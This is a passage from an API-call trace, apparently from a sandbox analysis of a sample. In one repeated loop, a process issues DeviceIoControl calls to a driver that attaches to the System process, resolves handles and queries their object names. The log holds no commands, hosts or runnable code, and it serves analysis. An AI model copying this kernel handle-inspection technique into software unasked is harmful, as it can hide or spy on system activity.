(Object=0xfffffa8001850990) returned 0x7a [0198.740] ObQueryNameString (in: Object=0xfffffa800352a560, ObjectNameInfo=0xfffffa8003154044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003154044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.740] ObfDereferenceObject (Object=0xfffffa800352a560) returned 0x1 [0198.740] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.740] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.740] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.740] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0198.740] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.740] PsAcquireProcessExitSynchronization () returned 0x0 [0198.740] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.740] ObReferenceObjectByHandle (in: Handle=0xffffffff800001fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800349f2b0, HandleInformation=0x0) returned 0x0 [0198.741] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.741] PsReleaseProcessExitSynchronization () returned 0x2 [0198.741] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.741] ObQueryNameString (in: Object=0xfffffa800349f2b0, ObjectNameInfo=0xfffffa8003155044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003155044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.741] ObfDereferenceObject (Object=0xfffffa800349f2b0) returned 0x1 [0198.741] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.741] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.741] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.741] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0198.741] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.741] PsAcquireProcessExitSynchronization () returned 0x0 [0198.742] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.742] ObReferenceObjectByHandle (in: Handle=0xffffffff80000200, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800352a690, HandleInformation=0x0) returned 0x0 [0198.742] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.742] PsReleaseProcessExitSynchronization () returned 0x2 [0198.743] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.743] ObQueryNameString (in: Object=0xfffffa800352a690, ObjectNameInfo=0xfffffa8003156044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003156044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.743] ObfDereferenceObject (Object=0xfffffa800352a690) returned 0x1 [0198.743] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.743] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.743] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.743] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0198.743] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.743] PsAcquireProcessExitSynchronization () returned 0x0 [0198.744] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.744] ObReferenceObjectByHandle (in: Handle=0xffffffff80000204, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800352af20, HandleInformation=0x0) returned 0x0 [0198.744] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.744] PsReleaseProcessExitSynchronization () returned 0x2 [0198.744] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.744] ObQueryNameString (in: Object=0xfffffa800352af20, ObjectNameInfo=0xfffffa8003157044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003157044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.744] ObfDereferenceObject (Object=0xfffffa800352af20) returned 0x1 [0198.744] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.744] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.745] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.745] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0198.745] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.745] PsAcquireProcessExitSynchronization () returned 0x0 [0198.745] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.745] ObReferenceObjectByHandle (in: Handle=0xffffffff80000208, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003547d40, HandleInformation=0x0) returned 0x0 [0198.745] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.745] PsReleaseProcessExitSynchronization () returned 0x2 [0198.745] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.745] ObQueryNameString (in: Object=0xfffffa8003547d40, ObjectNameInfo=0xfffffa8003158044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003158044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.745] ObfDereferenceObject (Object=0xfffffa8003547d40) returned 0x11 [0198.746] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.746] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.746] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.746] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xbc, lpOverlapped=0x0) returned 1 [0198.746] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.746] PsAcquireProcessExitSynchronization () returned 0x0 [0198.746] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.746] ObReferenceObjectByHandle (in: Handle=0xffffffff80000224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003560f20, HandleInformation=0x0) returned 0x0 [0198.746] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.746] PsReleaseProcessExitSynchronization () returned 0x2 [0198.747] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.747] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003159044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003159044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.747] ObfDereferenceObject (Object=0xfffffa8003560f20) returned 0x1 [0198.747] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.747] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.747] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.747] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xc2, lpOverlapped=0x0) returned 1 [0198.747] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.748] PsAcquireProcessExitSynchronization () returned 0x0 [0198.748] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.748] ObReferenceObjectByHandle (in: Handle=0xffffffff80000234, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80035605a0, HandleInformation=0x0) returned 0x0 [0198.748] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.748] PsReleaseProcessExitSynchronization () returned 0x2 [0198.748] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.748] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.748] ObfDereferenceObject (Object=0xfffffa80035605a0) returned 0x1 [0198.748] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.749] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.749] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.749] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0198.749] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.749] PsAcquireProcessExitSynchronization () returned 0x0 [0198.749] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.749] ObReferenceObjectByHandle (in: Handle=0xffffffff80000238, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003563520, HandleInformation=0x0) returned 0x0 [0198.749] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.749] PsReleaseProcessExitSynchronization () returned 0x2 [0198.749] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.749] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.750] ObfDereferenceObject (Object=0xfffffa8003563520) returned 0x1 [0198.750] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.750] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.750] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.750] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xb8, lpOverlapped=0x0) returned 1 [0198.750] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.750] PsAcquireProcessExitSynchronization () returned 0x0 [0198.750] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.750] ObReferenceObjectByHandle (in: Handle=0xffffffff80000240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003562770, HandleInformation=0x0) returned 0x0 [0198.750] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.751] PsReleaseProcessExitSynchronization () returned 0x2 [0198.751] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.751] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315d044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800315d044, ReturnLength=0xfffff880052b3508) returned 0x0 [0198.751] ObfDereferenceObject (Object=0xfffffa8003562770) returned 0x21 [0198.751] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.751] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.751] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.751] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0198.751] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.751] PsAcquireProcessExitSynchronization () returned 0x0 [0198.751] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.752] ObReferenceObjectByHandle (in: Handle=0xffffffff8000026c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003680df0, HandleInformation=0x0) returned 0x0 [0198.752] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.752] PsReleaseProcessExitSynchronization () returned 0x2 [0198.752] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.752] ObQueryNameString (in: Object=0xfffffa8003680df0, ObjectNameInfo=0xfffffa8003160044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003160044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.752] ObfDereferenceObject (Object=0xfffffa8003680df0) returned 0x1 [0198.752] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.752] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.753] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.753] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0198.753] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.753] PsAcquireProcessExitSynchronization () returned 0x0 [0198.753] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.753] ObReferenceObjectByHandle (in: Handle=0xffffffff8000027c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003682e20, HandleInformation=0x0) returned 0x0 [0198.753] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.753] PsReleaseProcessExitSynchronization () returned 0x2 [0198.753] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.753] ObQueryNameString (in: Object=0xfffffa8003682e20, ObjectNameInfo=0xfffffa8003161044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003161044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.754] ObfDereferenceObject (Object=0xfffffa8003682e20) returned 0x1 [0198.754] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.754] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.754] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.754] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0198.754] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.754] PsAcquireProcessExitSynchronization () returned 0x0 [0198.754] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.754] ObReferenceObjectByHandle (in: Handle=0xffffffff80000284, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80036801a0, HandleInformation=0x0) returned 0x0 [0198.754] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.755] PsReleaseProcessExitSynchronization () returned 0x2 [0198.755] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.755] ObQueryNameString (in: Object=0xfffffa80036801a0, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.755] ObfDereferenceObject (Object=0xfffffa80036801a0) returned 0x1 [0198.755] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.755] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.755] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.755] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8a, lpOverlapped=0x0) returned 1 [0198.755] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.756] PsAcquireProcessExitSynchronization () returned 0x0 [0198.757] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0198.757] ObReferenceObjectByHandle (in: Handle=0xffffffff80000288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003682530, HandleInformation=0x0) returned 0x0 [0198.757] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.757] PsReleaseProcessExitSynchronization () returned 0x2 [0198.757] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0198.757] ObQueryNameString (in: Object=0xfffffa8003682530, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.757] ObfDereferenceObject (Object=0xfffffa8003682530) returned 0x1 [0198.757] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.142] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.142] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.142] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x80, lpOverlapped=0x0) returned 1 [0199.142] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.142] PsAcquireProcessExitSynchronization () returned 0x0 [0199.142] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.142] ObReferenceObjectByHandle (in: Handle=0xffffffff8000029c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003538520, HandleInformation=0x0) returned 0x0 [0199.142] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.142] PsReleaseProcessExitSynchronization () returned 0x2 [0199.142] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.143] ObQueryNameString (in: Object=0xfffffa8003538520, ObjectNameInfo=0xfffffa8002c1e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8002c1e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.143] ObfDereferenceObject (Object=0xfffffa8003538520) returned 0x1 [0199.143] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.143] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.143] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.143] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x70, lpOverlapped=0x0) returned 1 [0199.143] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.143] PsAcquireProcessExitSynchronization () returned 0x0 [0199.143] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.143] ObReferenceObjectByHandle (in: Handle=0xffffffff800002a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003698db0, HandleInformation=0x0) returned 0x0 [0199.143] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.143] PsReleaseProcessExitSynchronization () returned 0x2 [0199.144] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.144] ObQueryNameString (in: Object=0xfffffa8003698db0, ObjectNameInfo=0xfffffa8003161044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003161044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.144] ObfDereferenceObject (Object=0xfffffa8003698db0) returned 0x1 [0199.144] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.144] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.144] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.144] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0199.144] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.144] PsAcquireProcessExitSynchronization () returned 0x0 [0199.144] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.144] ObReferenceObjectByHandle (in: Handle=0xffffffff800002b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8005213f20, HandleInformation=0x0) returned 0x0 [0199.144] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.144] PsReleaseProcessExitSynchronization () returned 0x2 [0199.144] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.144] ObQueryNameString (in: Object=0xfffffa8005213f20, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.144] ObfDereferenceObject (Object=0xfffffa8005213f20) returned 0x1 [0199.145] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.145] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.145] RtlAllocateHeap 